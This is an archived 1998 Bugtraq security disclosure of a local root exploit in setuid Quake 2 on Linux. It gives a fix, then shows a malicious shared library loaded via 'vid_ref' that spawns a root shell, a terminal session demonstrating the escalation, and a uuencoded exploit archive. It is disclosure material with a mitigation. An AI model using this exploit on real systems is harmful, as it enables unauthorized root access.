Bugtraq mailing list archives
Quake 2 Linux
From: kevingeo () CRUZIO COM (kevingeo () CRUZIO COM)
Date: Mon, 26 Jan 1998 01:16:37 -0500
Vulnerable: Anyone who made Quake2 setuid root in order to use the svgalib software refresh. Solution: chmod u-s quake2, and use ref_softx instead of ref_soft. If you prefer console-based video, you could get GGI (http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper (I haven't tried this). Exploit: Quake2 uses dlopen(3) to load its graphics code (which is in a seperate shared library). dlopen calls the _init function (if applicable) before it returns. Quake2 allows you to set which refresh driver to use on the command line, and loads the .so file from the working directory. The exploit is a shared library with one function; _init. It sets the uid and gid to 0, and spawns a shell. nop@chrome:~/ref_root> id uid=501(nop) gid=100(users) groups=100(users) nop@chrome:~/ref_root> make gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root couldn't exec default.cfg couldn't exec config.cfg Console initialized. ------- Loading ref_root.so ------- sh-2.00# sh-2.00# id uid=0(root) gid=0(root) groups=100(users) sh-2.00# exploit code follows. begin 644 ref_root.tgz M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&? M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=# MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5 M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7 M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+ M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@- MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC 3C#'&&&.,,<:^IK\_JS?9`"@``%?4 ` end
Current thread:
- GCC 2.7.? /tmp files, (continued)
- GCC 2.7.? /tmp files Micha? Zalewski (Jan 15)
- Re: GCC 2.7.? /tmp files Niels Bakker (Jan 16)
- pnserver exploit.. Aleph One (Jan 15)
- Re: pnserver exploit.. Angelos Karageorgiou (Jan 16)
- Re: pnserver exploit.. Donald van de Weyer (Jan 21)
- (AUSCERT ESB-98.009) CERT Advisory CA-98.02 - Vulnerabilities in Grant Beattie (Jan 21)
- Q179148: Settings May Not Be Applied with URL with Short Filename Aleph One (Jan 23)
- CDE: dtappgather on AIX Marcin Cieslak (Jan 25)
- Simple OpenBSD crash script Jason Downs (Jan 25)
- Re: Simple OpenBSD crash script GvS One (Jan 28)
- Quake 2 Linux kevingeo () CRUZIO COM (Jan 25)
- Re: Quake 2 Linux Greg Alexander (Jan 27)
- Announcement: Phrack 52 route () RESENTMENT INFONEXUS COM (Jan 26)
- Microsoft responds to bug in Exchange Server Tony Hagale (Jan 27)
- Re: Announcement: Phrack 52 Olaf Kirch (Jan 28)
- KSR[T] Advisory #7: filter KSR[T] (Jan 29)
- Bug in IMail's pop3d32.exe RHS Linux User (Jan 29)
- Secure Linux patch Solar Designer (Jan 29)
- Gaining Domain Admins access on LAN (fwd) Weld Pond (Jan 28)
- GZEXE - the big problem Micha? Zalewski (Jan 28)